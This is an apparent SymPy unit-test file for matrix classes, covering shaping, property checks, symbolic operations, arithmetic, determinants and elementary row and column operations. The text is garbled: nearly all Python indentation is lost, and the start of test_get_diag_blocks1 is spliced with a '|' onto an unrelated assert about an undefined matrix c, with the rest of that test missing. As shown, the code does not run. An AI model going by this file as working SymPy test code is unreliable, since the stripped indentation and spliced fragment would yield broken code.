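    assert m.reshape(1, 4).shape == (1, 4)  # reshape comes from MatrixShaping
    assert not hasattr(m, 'det')  # the determinant lives in MatrixDeterminant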
def test__MinimalMatrix():
x = _MinimalMatrix(2, 3, [1, 2, 3, 4, 5, 6])
assert x.rows == 2
assert x.cols == 3
assert x[2] == 3
assert x[1, 1] == 5
assert list(x) == [1, 2, 3, 4, 5, 6]
assert list(x[1, :]) == [4, 5, 6]
assert list(x[:, 1]) == [2, 5]
assert list(x[:, :]) == list(x)
assert x[:, :] == x
assert _MinimalMatrix(x) == x
assert _MinimalMatrix([[1, 2, 3], [4, 5, 6]]) == x
assert _MinimalMatrix(([1, 2, 3], [4, 5, 6])) == x
assert _MinimalMatrix([(1, 2, 3), (4, 5, 6)]) == x
assert _MinimalMatrix(((1, 2, 3), (4, 5, 6))) == x
assert not (_MinimalMatrix([[1, 2], [3, 4], [5, 6]]) == x)
# ShapingOnlyMatrix tests
def test_vec():
m = ShapingOnlyMatrix(2, 2, [1, 3, 2, 4])
m_vec = m.vec()
assert m_vec.cols == 1
for i in range(4):
assert m_vec[i] == i + 1
def test_tolist():
lst = [[S.One, S.Half, x*y, S.Zero], [x, y, z, x**2], [y, -S.One, z*x, 3]]
flat_lst = [S.One, S.Half, x*y, S.Zero, x, y, z, x**2, y, -S.One, z*x, 3]
m = ShapingOnlyMatrix(3, 4, flat_lst)
assert m.tolist() == lst
def test_row_col_del():
e = ShapingOnlyMatrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 9])
raises(ValueError, lambda: e.row_del(5))
raises(ValueError, lambda: e.row_del(-5))
raises(ValueError, lambda: e.col_del(5))
raises(ValueError, lambda: e.col_del(-5))
assert e.row_del(2) == e.row_del(-1) == Matrix([[1, 2, 3], [4, 5, 6]])
assert e.col_del(2) == e.col_del(-1) == Matrix([[1, 2], [4, 5], [7, 8]])
assert e.row_del(1) == e.row_del(-2) == Matrix([[1, 2, 3], [7, 8, 9]])
assert e.col_del(1) == e.col_del(-2) == Matrix([[1, 3], [4, 6], [7, 9]])
def test_get_diag_blocks1():
a = Matrix([[1, 2], [2, 3]]) | assert c.get_diag_blocks() == [c]
def test_get_diag_blocks2():
a = Matrix([[1, 2], [2, 3]])
b = Matrix([[3, x], [y, 3]])
c = Matrix([[3, x, 3], [y, 3, z], [x, y, z]])
A, B, C, D = diag(a, b, b), diag(a, b, c), diag(a, c, b), diag(c, c, b)
A = ShapingOnlyMatrix(A.rows, A.cols, A)
B = ShapingOnlyMatrix(B.rows, B.cols, B)
C = ShapingOnlyMatrix(C.rows, C.cols, C)
D = ShapingOnlyMatrix(D.rows, D.cols, D)
assert A.get_diag_blocks() == [a, b, b]
assert B.get_diag_blocks() == [a, b, c]
assert C.get_diag_blocks() == [a, c, b]
assert D.get_diag_blocks() == [c, c, b]
def test_shape():
m = ShapingOnlyMatrix(1, 2, [0, 0])
    assert m.shape == (1, 2)
def test_reshape():
m0 = eye_Shaping(3)
assert m0.reshape(1, 9) == Matrix(1, 9, (1, 0, 0, 0, 1, 0, 0, 0, 1))
m1 = ShapingOnlyMatrix(3, 4, lambda i, j: i + j)
assert m1.reshape(
4, 3) == Matrix(((0, 1, 2), (3, 1, 2), (3, 4, 2), (3, 4, 5)))
assert m1.reshape(2, 6) == Matrix(((0, 1, 2, 3, 1, 2), (3, 4, 2, 3, 4, 5)))
def test_row_col():
m = ShapingOnlyMatrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 9])
assert m.row(0) == Matrix(1, 3, [1, 2, 3])
assert m.col(0) == Matrix(3, 1, [1, 4, 7])
def test_row_join():
assert eye_Shaping(3).row_join(Matrix([7, 7, 7])) == \
Matrix([[1, 0, 0, 7],
[0, 1, 0, 7],
[0, 0, 1, 7]])
def test_col_join():
assert eye_Shaping(3).col_join(Matrix([[7, 7, 7]])) == \
Matrix([[1, 0, 0],
[0, 1, 0],
[0, 0, 1],
[7, 7, 7]])
def test_row_insert():
r4 = Matrix([[4, 4, 4]])
for i in range(-4, 5):
l = [1, 0, 0]
l.insert(i, 4)
assert flatten(eye_Shaping(3).row_insert(i, r4).col(0).tolist()) == l
def test_col_insert():
c4 = Matrix([4, 4, 4])
for i in range(-4, 5):
l = [0, 0, 0]
l.insert(i, 4)
assert flatten(zeros_Shaping(3).col_insert(i, c4).row(0).tolist()) == l
# issue 13643
assert eye_Shaping(6).col_insert(3, Matrix([[2, 2], [2, 2], [2, 2], [2, 2], [2, 2], [2, 2]])) == \
Matrix([[1, 0, 0, 2, 2, 0, 0, 0],
[0, 1, 0, 2, 2, 0, 0, 0],
[0, 0, 1, 2, 2, 0, 0, 0],
[0, 0, 0, 2, 2, 1, 0, 0],
[0, 0, 0, 2, 2, 0, 1, 0],
[0, 0, 0, 2, 2, 0, 0, 1]])
def test_extract():
m = ShapingOnlyMatrix(4, 3, lambda i, j: i*3 + j)
assert m.extract([0, 1, 3], [0, 1]) == Matrix(3, 2, [0, 1, 3, 4, 9, 10])
assert m.extract([0, 3], [0, 0, 2]) == Matrix(2, 3, [0, 0, 2, 9, 9, 11])
assert m.extract(range(4), range(3)) == m
raises(IndexError, lambda: m.extract([4], [0]))
raises(IndexError, lambda: m.extract([0], [3]))
def test_hstack():
m = ShapingOnlyMatrix(4, 3, lambda i, j: i*3 + j)
m2 = ShapingOnlyMatrix(3, 4, lambda i, j: i*3 + j)
assert m == m.hstack(m)
assert m.hstack(m, m, m) == ShapingOnlyMatrix.hstack(m, m, m) == Matrix([
[0, 1, 2, 0, 1, 2, 0, 1, 2],
[3, 4, 5, 3, 4, 5, 3, 4, 5],
[6, 7, 8, 6, 7, 8, 6, 7, 8],
[9, 10, 11, 9, 10, 11, 9, 10, 11]])
raises(ShapeError, lambda: m.hstack(m, m2))
assert Matrix.hstack() == Matrix()
# test regression #12938
M1 = Matrix.zeros(0, 0)
M2 = Matrix.zeros(0, 1)
M3 = Matrix.zeros(0, 2)
M4 = Matrix.zeros(0, 3)
m = ShapingOnlyMatrix.hstack(M1, M2, M3, M4)
assert m.rows == 0 and m.cols == 6
def test_vstack():
m = ShapingOnlyMatrix(4, 3, lambda i, j: i*3 + j)
m2 = ShapingOnlyMatrix(3, 4, lambda i, j: i*3 + j)
assert m == m.vstack(m)
assert m.vstack(m, m, m) == ShapingOnlyMatrix.vstack(m, m, m) == Matrix([
[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
[9, 10, 11],
[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
[9, 10, 11],
[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
[9, 10, 11]])
raises(ShapeError, lambda: m.vstack(m, m2))
assert Matrix.vstack() == Matrix()
# PropertiesOnlyMatrix tests
def test_atoms():
m = PropertiesOnlyMatrix(2, 2, [1, 2, x, 1 - 1/x])
assert m.atoms() == {S(1),S(2),S(-1), x}
assert m.atoms(Symbol) == {x}
def test_free_symbols():
assert PropertiesOnlyMatrix([[x], [0]]).free_symbols == {x}
def test_has():
A = PropertiesOnlyMatrix(((x, y), (2, 3)))
assert A.has(x)
assert not A.has(z)
assert A.has(Symbol)
A = PropertiesOnlyMatrix(((2, y), (2, 3)))
assert not A.has(x)
def test_is_anti_symmetric():
x = symbols('x')
assert PropertiesOnlyMatrix(2, 1, [1, 2]).is_anti_symmetric() is False
m = PropertiesOnlyMatrix(3, 3, [0, x**2 + 2*x + 1, y, -(x + 1)**2, 0, x*y, -y, -x*y, 0])
assert m.is_anti_symmetric() is True
assert m.is_anti_symmetric(simplify=False) is False
assert m.is_anti_symmetric(simplify=lambda x: x) is False
m = PropertiesOnlyMatrix(3, 3, [x.expand() for x in m])
assert m.is_anti_symmetric(simplify=False) is True
m = PropertiesOnlyMatrix(3, 3, [x.expand() for x in [S.One] + list(m)[1:]])
assert m.is_anti_symmetric() is False
def test_diagonal_symmetrical():
m = PropertiesOnlyMatrix(2, 2, [0, 1, 1, 0])
assert not m.is_diagonal()
assert m.is_symmetric()
assert m.is_symmetric(simplify=False)
m = PropertiesOnlyMatrix(2, 2, [1, 0, 0, 1])
assert m.is_diagonal()
m = PropertiesOnlyMatrix(3, 3, diag(1, 2, 3))
assert m.is_diagonal()
assert m.is_symmetric()
m = PropertiesOnlyMatrix(3, 3, [1, 0, 0, 0, 2, 0, 0, 0, 3])
assert m == diag(1, 2, 3)
m = PropertiesOnlyMatrix(2, 3, zeros(2, 3))
assert not m.is_symmetric()
assert m.is_diagonal()
m = PropertiesOnlyMatrix(((5, 0), (0, 6), (0, 0)))
assert m.is_diagonal()
m = PropertiesOnlyMatrix(((5, 0, 0), (0, 6, 0)))
assert m.is_diagonal()
m = Matrix(3, 3, [1, x**2 + 2*x + 1, y, (x + 1)**2, 2, 0, y, 0, 3])
assert m.is_symmetric()
assert not m.is_symmetric(simplify=False)
assert m.expand().is_symmetric(simplify=False)
def test_is_hermitian():
a = PropertiesOnlyMatrix([[1, I], [-I, 1]])
assert a.is_hermitian
a = PropertiesOnlyMatrix([[2*I, I], [-I, 1]])
assert a.is_hermitian is False
a = PropertiesOnlyMatrix([[x, I], [-I, 1]])
assert a.is_hermitian is None
a = PropertiesOnlyMatrix([[x, 1], [-I, 1]])
assert a.is_hermitian is False
def test_is_Identity():
assert eye_Properties(3).is_Identity
assert not PropertiesOnlyMatrix(zeros(3)).is_Identity
assert not PropertiesOnlyMatrix(ones(3)).is_Identity
# issue 6242
assert not PropertiesOnlyMatrix([[1, 0, 0]]).is_Identity
def test_is_symbolic():
a = PropertiesOnlyMatrix([[x, x], [x, x]])
assert a.is_symbolic() is True
a = PropertiesOnlyMatrix([[1, 2, 3, 4], [5, 6, 7, 8]])
assert a.is_symbolic() is False
a = PropertiesOnlyMatrix([[1, 2, 3, 4], [5, 6, x, 8]])
assert a.is_symbolic() is True
a = PropertiesOnlyMatrix([[1, x, 3]])
assert a.is_symbolic() is True
a = PropertiesOnlyMatrix([[1, 2, 3]])
assert a.is_symbolic() is False
a = PropertiesOnlyMatrix([[1], [x], [3]])
assert a.is_symbolic() is True
a = PropertiesOnlyMatrix([[1], [2], [3]])
assert a.is_symbolic() is False
def test_is_upper():
a = PropertiesOnlyMatrix([[1, 2, 3]])
assert a.is_upper is True
a = PropertiesOnlyMatrix([[1], [2], [3]])
assert a.is_upper is False
def test_is_lower():
a = PropertiesOnlyMatrix([[1, 2, 3]])
assert a.is_lower is False
a = PropertiesOnlyMatrix([[1], [2], [3]])
assert a.is_lower is True
def test_is_square():
m = PropertiesOnlyMatrix([[1],[1]])
m2 = PropertiesOnlyMatrix([[2,2],[2,2]])
assert not m.is_square
assert m2.is_square
def test_is_symmetric():
m = PropertiesOnlyMatrix(2, 2, [0, 1, 1, 0])
assert m.is_symmetric()
m = PropertiesOnlyMatrix(2, 2, [0, 1, 0, 1])
assert not m.is_symmetric()
def test_is_hessenberg():
A = PropertiesOnlyMatrix([[3, 4, 1], [2, 4, 5], [0, 1, 2]])
assert A.is_upper_hessenberg
A = PropertiesOnlyMatrix(3, 3, [3, 2, 0, 4, 4, 1, 1, 5, 2])
assert A.is_lower_hessenberg
A = PropertiesOnlyMatrix(3, 3, [3, 2, -1, 4, 4, 1, 1, 5, 2])
assert A.is_lower_hessenberg is False
assert A.is_upper_hessenberg is False
A = PropertiesOnlyMatrix([[3, 4, 1], [2, 4, 5], [3, 1, 2]])
assert not A.is_upper_hessenberg
def test_is_zero():
assert PropertiesOnlyMatrix(0, 0, []).is_zero
assert PropertiesOnlyMatrix([[0, 0], [0, 0]]).is_zero
assert PropertiesOnlyMatrix(zeros(3, 4)).is_zero
assert not PropertiesOnlyMatrix(eye(3)).is_zero
    assert PropertiesOnlyMatrix([[x, 0], [0, 0]]).is_zero is None
    assert PropertiesOnlyMatrix([[x, 1], [0, 0]]).is_zero is False
    a = Symbol('a', nonzero=True)
    assert PropertiesOnlyMatrix([[a, 0], [0, 0]]).is_zero is False
def test_values():
assert set(PropertiesOnlyMatrix(2,2,[0,1,2,3]).values()) == set([1,2,3])
x = Symbol('x', real=True)
assert set(PropertiesOnlyMatrix(2,2,[x,0,0,1]).values()) == set([x,1])
# OperationsOnlyMatrix tests
def test_applyfunc():
m0 = OperationsOnlyMatrix(eye(3))
assert m0.applyfunc(lambda x: 2*x) == eye(3)*2
assert m0.applyfunc(lambda x: 0) == zeros(3)
assert m0.applyfunc(lambda x: 1) == ones(3)
def test_adjoint():
dat = [[0, I], [1, 0]]
ans = OperationsOnlyMatrix([[0, 1], [-I, 0]])
assert ans.adjoint() == Matrix(dat)
def test_as_real_imag():
m1 = OperationsOnlyMatrix(2,2,[1,2,3,4])
m3 = OperationsOnlyMatrix(2,2,[1+S.ImaginaryUnit,2+2*S.ImaginaryUnit,3+3*S.ImaginaryUnit,4+4*S.ImaginaryUnit])
a,b = m3.as_real_imag()
assert a == m1
assert b == m1
def test_conjugate():
M = OperationsOnlyMatrix([[0, I, 5],
[1, 2, 0]])
assert M.T == Matrix([[0, 1],
[I, 2],
[5, 0]])
assert M.C == Matrix([[0, -I, 5],
[1, 2, 0]])
assert M.C == M.conjugate()
assert M.H == M.T.C
assert M.H == Matrix([[ 0, 1],
[-I, 2],
[ 5, 0]])
def test_doit():
a = OperationsOnlyMatrix([[Add(x,x, evaluate=False)]])
assert a[0] != 2*x
assert a.doit() == Matrix([[2*x]])
def test_evalf():
a = OperationsOnlyMatrix(2, 1, [sqrt(5), 6])
assert all(a.evalf()[i] == a[i].evalf() for i in range(2))
assert all(a.evalf(2)[i] == a[i].evalf(2) for i in range(2))
assert all(a.n(2)[i] == a[i].n(2) for i in range(2))
def test_expand():
m0 = OperationsOnlyMatrix([[x*(x + y), 2], [((x + y)*y)*x, x*(y + x*(x + y))]])
# Test if expand() returns a matrix
m1 = m0.expand()
assert m1 == Matrix(
[[x*y + x**2, 2], [x*y**2 + y*x**2, x*y + y*x**2 + x**3]])
a = Symbol('a', real=True)
assert OperationsOnlyMatrix(1, 1, [exp(I*a)]).expand(complex=True) == \
Matrix([cos(a) + I*sin(a)])
def test_refine():
m0 = OperationsOnlyMatrix([[Abs(x)**2, sqrt(x**2)],
[sqrt(x**2)*Abs(y)**2, sqrt(y**2)*Abs(x)**2]])
m1 = m0.refine(Q.real(x) & Q.real(y))
assert m1 == Matrix([[x**2, Abs(x)], [y**2*Abs(x), x**2*Abs(y)]])
m1 = m0.refine(Q.positive(x) & Q.positive(y))
assert m1 == Matrix([[x**2, x], [x*y**2, x**2*y]])
m1 = m0.refine(Q.negative(x) & Q.negative(y))
assert m1 == Matrix([[x**2, -x], [-x*y**2, -x**2*y]])
def test_replace():
F, G = symbols('F, G', cls=Function)
K = OperationsOnlyMatrix(2, 2, lambda i, j: G(i+j))
M = OperationsOnlyMatrix(2, 2, lambda i, j: F(i+j))
N = M.replace(F, G)
assert N == K
def test_replace_map():
F, G = symbols('F, G', cls=Function)
K = OperationsOnlyMatrix(2, 2, [(G(0), {F(0): G(0)}), (G(1), {F(1): G(1)}), (G(1), {F(1) \
: G(1)}), (G(2), {F(2): G(2)})])
M = OperationsOnlyMatrix(2, 2, lambda i, j: F(i+j))
N = M.replace(F, G, True)
assert N == K
def test_simplify():
n = Symbol('n')
f = Function('f')
M = OperationsOnlyMatrix([[ 1/x + 1/y, (x + x*y) / x ],
[ (f(x) + y*f(x))/f(x), 2 * (1/n - cos(n * pi)/n) / pi ]])
assert M.simplify() == Matrix([[ (x + y)/(x * y), 1 + y ],
[ 1 + y, 2*((1 - 1*cos(pi*n))/(pi*n)) ]])
eq = (1 + x)**2
M = OperationsOnlyMatrix([[eq]])
assert M.simplify() == Matrix([[eq]])
assert M.simplify(ratio=oo) == Matrix([[eq.simplify(ratio=oo)]])
def test_subs():
assert OperationsOnlyMatrix([[1, x], [x, 4]]).subs(x, 5) == Matrix([[1, 5], [5, 4]])
assert OperationsOnlyMatrix([[x, 2], [x + y, 4]]).subs([[x, -1], [y, -2]]) == \
Matrix([[-1, 2], [-3, 4]])
assert OperationsOnlyMatrix([[x, 2], [x + y, 4]]).subs([(x, -1), (y, -2)]) == \
Matrix([[-1, 2], [-3, 4]])
assert OperationsOnlyMatrix([[x, 2], [x + y, 4]]).subs({x: -1, y: -2}) == \
Matrix([[-1, 2], [-3, 4]])
assert OperationsOnlyMatrix([[x*y]]).subs({x: y - 1, y: x - 1}, simultaneous=True) == \
Matrix([[(x - 1)*(y - 1)]])
def test_trace():
M = OperationsOnlyMatrix([[1, 0, 0],
[0, 5, 0],
[0, 0, 8]])
assert M.trace() == 14
def test_xreplace():
assert OperationsOnlyMatrix([[1, x], [x, 4]]).xreplace({x: 5}) == \
Matrix([[1, 5], [5, 4]])
assert OperationsOnlyMatrix([[x, 2], [x + y, 4]]).xreplace({x: -1, y: -2}) == \
Matrix([[-1, 2], [-3, 4]])
def test_permute():
a = OperationsOnlyMatrix(3, 4, [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
raises(IndexError, lambda: a.permute([[0,5]]))
b = a.permute_rows([[0, 2], [0, 1]])
assert a.permute([[0, 2], [0, 1]]) == b == Matrix([
[5, 6, 7, 8],
[9, 10, 11, 12],
[1, 2, 3, 4]])
b = a.permute_cols([[0, 2], [0, 1]])
assert a.permute([[0, 2], [0, 1]], orientation='cols') == b ==\
Matrix([
[ 2, 3, 1, 4],
[ 6, 7, 5, 8],
[10, 11, 9, 12]])
b = a.permute_cols([[0, 2], [0, 1]], direction='backward')
assert a.permute([[0, 2], [0, 1]], orientation='cols', direction='backward') == b ==\
Matrix([
[ 3, 1, 2, 4],
[ 7, 5, 6, 8],
[11, 9, 10, 12]])
assert a.permute([1, 2, 0, 3]) == Matrix([
[5, 6, 7, 8],
[9, 10, 11, 12],
[1, 2, 3, 4]])
from sympy.combinatorics import Permutation
assert a.permute(Permutation([1, 2, 0, 3])) == Matrix([
[5, 6, 7, 8],
[9, 10, 11, 12],
[1, 2, 3, 4]])
# ArithmeticOnlyMatrix tests
def test_abs():
m = ArithmeticOnlyMatrix([[1, -2], [x, y]])
assert abs(m) == ArithmeticOnlyMatrix([[1, 2], [Abs(x), Abs(y)]])
def test_add():
m = ArithmeticOnlyMatrix([[1, 2, 3], [x, y, x], [2*y, -50, z*x]])
assert m + m == ArithmeticOnlyMatrix([[2, 4, 6], [2*x, 2*y, 2*x], [4*y, -100, 2*z*x]])
n = ArithmeticOnlyMatrix(1, 2, [1, 2])
raises(ShapeError, lambda: m + n)
def test_multiplication():
a = ArithmeticOnlyMatrix((
(1, 2),
(3, 1),
(0, 6),
))
b = ArithmeticOnlyMatrix((
(1, 2),
(3, 0),
))
raises(ShapeError, lambda: b*a)
raises(TypeError, lambda: a*{})
c = a*b
assert c[0, 0] == 7
assert c[0, 1] == 2
assert c[1, 0] == 6
assert c[1, 1] == 6
assert c[2, 0] == 18
assert c[2, 1] == 0
try:
        c = eval('a @ b')
except SyntaxError:
pass
else:
assert c[0, 0] == 7
assert c[0, 1] == 2
assert c[1, 0] == 6
assert c[1, 1] == 6
assert c[2, 0] == 18
assert c[2, 1] == 0
h = a.multiply_elementwise(c)
assert h == matrix_multiply_elementwise(a, c)
assert h[0, 0] == 7
assert h[0, 1] == 4
assert h[1, 0] == 18
assert h[1, 1] == 6
assert h[2, 0] == 0
assert h[2, 1] == 0
raises(ShapeError, lambda: a.multiply_elementwise(b))
c = b * Symbol("x")
assert isinstance(c, ArithmeticOnlyMatrix)
assert c[0, 0] == x
assert c[0, 1] == 2*x
assert c[1, 0] == 3*x
assert c[1, 1] == 0
c2 = x * b
assert c == c2
c = 5 * b
assert isinstance(c, ArithmeticOnlyMatrix)
assert c[0, 0] == 5
assert c[0, 1] == 2*5
assert c[1, 0] == 3*5
assert c[1, 1] == 0
    # scalar @ matrix is rejected with TypeError on Python 3.5+ (matmul is
    # matrix-matrix only, cf. test_matmul below); the eval keeps the @
    # operator from being a SyntaxError at import time on older Pythons
    try:
        eval('5 @ b')
    except SyntaxError:
        pass
    except TypeError:
        pass
def test_matmul():
a = Matrix([[1, 2], [3, 4]])
assert a.__matmul__(2) == NotImplemented
assert a.__rmatmul__(2) == NotImplemented
    # This is done this way because @ is only supported in Python 3.5+
    # To check the 2 @ a case
try:
eval('2 @ a')
except SyntaxError:
pass
    except TypeError:  # TypeError is raised when NotImplemented is returned
pass
    # Check the a @ 2 case
try:
eval('a @ 2')
except SyntaxError:
pass
    except TypeError:  # TypeError is raised when NotImplemented is returned
pass
def test_power():
raises(NonSquareMatrixError, lambda: Matrix((1, 2))**2)
A = ArithmeticOnlyMatrix([[2, 3], [4, 5]])
assert (A**5)[:] == (6140, 8097, 10796, 14237)
A = ArithmeticOnlyMatrix([[2, 1, 3], [4, 2, 4], [6, 12, 1]])
assert (A**3)[:] == (290, 262, 251, 448, 440, 368, 702, 954, 433)
assert A**0 == eye(3)
assert A**1 == A
assert (ArithmeticOnlyMatrix([[2]]) ** 100)[0, 0] == 2**100
assert ArithmeticOnlyMatrix([[1, 2], [3, 4]])**Integer(2) == ArithmeticOnlyMatrix([[7, 10], [15, 22]])
def test_neg():
n = ArithmeticOnlyMatrix(1, 2, [1, 2])
assert -n == ArithmeticOnlyMatrix(1, 2, [-1, -2])
def test_sub():
n = ArithmeticOnlyMatrix(1, 2, [1, 2])
assert n - n == ArithmeticOnlyMatrix(1, 2, [0, 0])
def test_div():
n = ArithmeticOnlyMatrix(1, 2, [1, 2])
assert n/2 == ArithmeticOnlyMatrix(1, 2, [S(1)/2, S(2)/2])
# DeterminantOnlyMatrix tests
def test_det():
a = DeterminantOnlyMatrix(2,3,[1,2,3,4,5,6])
raises(NonSquareMatrixError, lambda: a.det())
z = zeros_Determinant(2)
ey = eye_Determinant(2)
assert z.det() == 0
assert ey.det() == 1
x = Symbol('x')
a = DeterminantOnlyMatrix(0,0,[])
b = DeterminantOnlyMatrix(1,1,[5])
c = DeterminantOnlyMatrix(2,2,[1,2,3,4])
d = DeterminantOnlyMatrix(3,3,[1,2,3,4,5,6,7,8,8])
e = DeterminantOnlyMatrix(4,4,[x,1,2,3,4,5,6,7,2,9,10,11,12,13,14,14])
# the method keyword for `det` doesn't kick in until 4x4 matrices,
# so there is no need to test all methods on smaller ones
assert a.det() == 1
assert b.det() == 5
assert c.det() == -2
assert d.det() == 3
assert e.det() == 4*x - 24
assert e.det(method='bareiss') == 4*x - 24
assert e.det(method='berkowitz') == 4*x - 24
raises(ValueError, lambda: e.det(iszerofunc="test"))
def test_adjugate():
x = Symbol('x')
e = DeterminantOnlyMatrix(4,4,[x,1,2,3,4,5,6,7,2,9,10,11,12,13,14,14])
adj = Matrix([
[ 4, -8, 4, 0],
[ 76, -14*x - 68, 14*x - 8, -4*x + 24],
[-122, 17*x + 142, -21*x + 4, 8*x - 48],
[ 48, -4*x - 72, 8*x, -4*x + 24]])
assert e.adjugate() == adj
assert e.adjugate(method='bareiss') == adj
assert e.adjugate(method='berkowitz') == adj
a = DeterminantOnlyMatrix(2,3,[1,2,3,4,5,6])
raises(NonSquareMatrixError, lambda: a.adjugate())
def test_cofactor_and_minors():
x = Symbol('x')
e = DeterminantOnlyMatrix(4,4,[x,1,2,3,4,5,6,7,2,9,10,11,12,13,14,14])
m = Matrix([
[ x, 1, 3],
[ 2, 9, 11],
[12, 13, 14]])
cm = Matrix([
[ 4, 76, -122, 48],
[-8, -14*x - 68, 17*x + 142, -4*x - 72],
[ 4, 14*x - 8, -21*x + 4, 8*x],
[ 0, -4*x + 24, 8*x - 48, -4*x + 24]])
sub = Matrix([
[x, 1, 2],
[4, 5, 6],
[2, 9, 10]])
assert e.minor_submatrix(1,2) == m
assert e.minor_submatrix(-1,-1) == sub
assert e.minor(1,2) == -17*x - 142
assert e.cofactor(1,2) == 17*x + 142
assert e.cofactor_matrix() == cm
assert e.cofactor_matrix(method="bareiss") == cm
assert e.cofactor_matrix(method="berkowitz") == cm
raises(ValueError, lambda: e.cofactor(4,5))
raises(ValueError, lambda: e.minor(4,5))
raises(ValueError, lambda: e.minor_submatrix(4,5))
a = DeterminantOnlyMatrix(2,3,[1,2,3,4,5,6])
assert a.minor_submatrix(0,0) == Matrix([[5, 6]])
raises(ValueError, lambda: DeterminantOnlyMatrix(0,0,[]).minor_submatrix(0,0))
raises(NonSquareMatrixError, lambda: a.cofactor(0,0))
raises(NonSquareMatrixError, lambda: a.minor(0,0))
raises(NonSquareMatrixError, lambda: a.cofactor_matrix())
def test_charpoly():
x, y = Symbol('x'), Symbol('y')
m = DeterminantOnlyMatrix(3,3,[1,2,3,4,5,6,7,8,9])
assert eye_Determinant(3).charpoly(x) == Poly((x - 1)**3, x)
assert eye_Determinant(3).charpoly(y) == Poly((y - 1)**3, y)
assert m.charpoly() == Poly(x**3 - 15*x**2 - 18*x, x)
raises(NonSquareMatrixError, lambda: Matrix([[1], [2]]).charpoly())
# ReductionsOnlyMatrix tests
def test_row_op():
e = eye_Reductions(3)
raises(ValueError, lambda: e.elementary_row_op("abc"))
raises(ValueError, lambda: e.elementary_row_op())
raises(ValueError, lambda: e.elementary_row_op('n->kn', row=5, k=5))
raises(ValueError, lambda: e.elementary_row_op('n->kn', row=-5, k=5))
raises(ValueError, lambda: e.elementary_row_op('n<->m', row1=1, row2=5))
raises(ValueError, lambda: e.elementary_row_op('n<->m', row1=5, row2=1))
raises(ValueError, lambda: e.elementary_row_op('n<->m', row1=-5, row2=1))
raises(ValueError, lambda: e.elementary_row_op('n<->m', row1=1, row2=-5))
raises(ValueError, lambda: e.elementary_row_op('n->n+km', row1=1, row2=5, k=5))
raises(ValueError, lambda: e.elementary_row_op('n->n+km', row1=5, row2=1, k=5))
raises(ValueError, lambda: e.elementary_row_op('n->n+km', row1=-5, row2=1, k=5))
raises(ValueError, lambda: e.elementary_row_op('n->n+km', row1=1, row2=-5, k=5))
raises(ValueError, lambda: e.elementary_row_op('n->n+km', row1=1, row2=1, k=5))
# test various ways to set arguments
assert e.elementary_row_op("n->kn", 0, 5) == Matrix([[5, 0, 0], [0, 1, 0], [0, 0, 1]])
assert e.elementary_row_op("n->kn", 1, 5) == Matrix([[1, 0, 0], [0, 5, 0], [0, 0, 1]])
assert e.elementary_row_op("n->kn", row=1, k=5) == Matrix([[1, 0, 0], [0, 5, 0], [0, 0, 1]])
assert e.elementary_row_op("n->kn", row1=1, k=5) == Matrix([[1, 0, 0], [0, 5, 0], [0, 0, 1]])
assert e.elementary_row_op("n<->m", 0, 1) == Matrix([[0, 1, 0], [1, 0, 0], [0, 0, 1]])
assert e.elementary_row_op("n<->m", row1=0, row2=1) == Matrix([[0, 1, 0], [1, 0, 0], [0, 0, 1]])
assert e.elementary_row_op("n<->m", row=0, row2=1) == Matrix([[0, 1, 0], [1, 0, 0], [0, 0, 1]])
assert e.elementary_row_op("n->n+km", 0, 5, 1) == Matrix([[1, 5, 0], [0, 1, 0], [0, 0, 1]])
assert e.elementary_row_op("n->n+km", row=0, k=5, row2=1) == Matrix([[1, 5, 0], [0, 1, 0], [0, 0, 1]])
assert e.elementary_row_op("n->n+km", row1=0, k=5, row2=1) == Matrix([[1, 5, 0], [0, 1, 0], [0, 0, 1]])
# make sure the matrix doesn't change size
a = ReductionsOnlyMatrix(2, 3, [0]*6)
assert a.elementary_row_op("n->kn", 1, 5) == Matrix(2, 3, [0]*6)
assert a.elementary_row_op("n<->m", 0, 1) == Matrix(2, 3, [0]*6)
assert a.elementary_row_op("n->n+km", 0, 5, 1) == Matrix(2, 3, [0]*6)
def test_col_op():
e = eye_Reductions(3)
raises(ValueError, lambda: e.elementary_col_op("abc"))
raises(ValueError, lambda: e.elementary_col_op())
raises(ValueError, lambda: e.elementary_col_op('n->kn', col=5, k=5))
raises(ValueError, lambda: e.elementary_col_op('n->kn', col=-5, k=5))
raises(ValueError, lambda: e.elementary_col_op('n<->m', col1=1, col2=5))
raises(ValueError, lambda: e.elementary_col_op('n<->m', col1=5, col2=1))
raises(ValueError, lambda: e.elementary_col_op('n<->m', col1=-5, col2=1))
raises(ValueError, lambda: e.elementary_col_op('n<->m', col1=1, col2=-5))
raises(ValueError, lambda: e.elementary_col_op('n->n+km', col1=1, col2=5, k=5))
raises(ValueError, lambda: e.elementary_col_op('n->n+km', col1=5, col2=1, k=5))
raises(ValueError, lambda: e.elementary_col_op('n->n+km', col1=-5, col2=1, k=5))
raises(ValueError, lambda: e.elementary_col_op('n->n+km', col1=1, col2=-5, k=5))
raises(ValueError, lambda: e.elementary_col_op('n->n+km', col1=1, col2=1, k=5))
# test various ways to set arguments
assert e.elementary_col_op("n->kn", 0, 5) == Matrix([[5, 0, 0], [0, 1, 0], [0, 0, 1]])
assert e.elementary_col_op("n->kn", 1, 5) == Matrix([[1, 0, 0], [0, 5, 0], [0, 0, 1]])
assert e.elementary_col_op("n->kn", col=1, k=5) == Matrix([[1, 0, 0], [0, 5, 0], [0, 0, 1]])
assert e.elementary_col_op("n->kn", col1=1, k=5) == Matrix([[1, 0, 0], [0, 5, 0], [0, 0, 1]])
assert e.elementary_col_op("n<->m", 0, 1) == Matrix([[0, 1, 0], [1, 0, 0], [0, 0, 1]])
assert e.elementary_col_op("n<->m", col1=0, col2=1) == Matrix([[0, 1, 0], [1, 0, 0], [0, 0, 1]])
assert e.elementary_col_op("n<->m", col=0, col2=1) == Matrix([[0, 1, 0], [1, 0, 0], [0, 0, 1]])
assert e.elementary_col_op("n->n+km", 0, 5, 1) == Matrix([[1, 0, 0], [5, 1, 0], [0, 0, 1]])
assert e.elementary_col_op("n->n+km", col=0, k=5, col2=1) == Matrix([[1, 0, 0], [5, 1, 0], [0, 0, 1]])
assert e.elementary_col_op("n->n+km", col1=0, k=5, col2=1) == Matrix([[1, 0, 0], [5, 1, 0], [0, 0, 1]])
# make sure the matrix doesn't change size
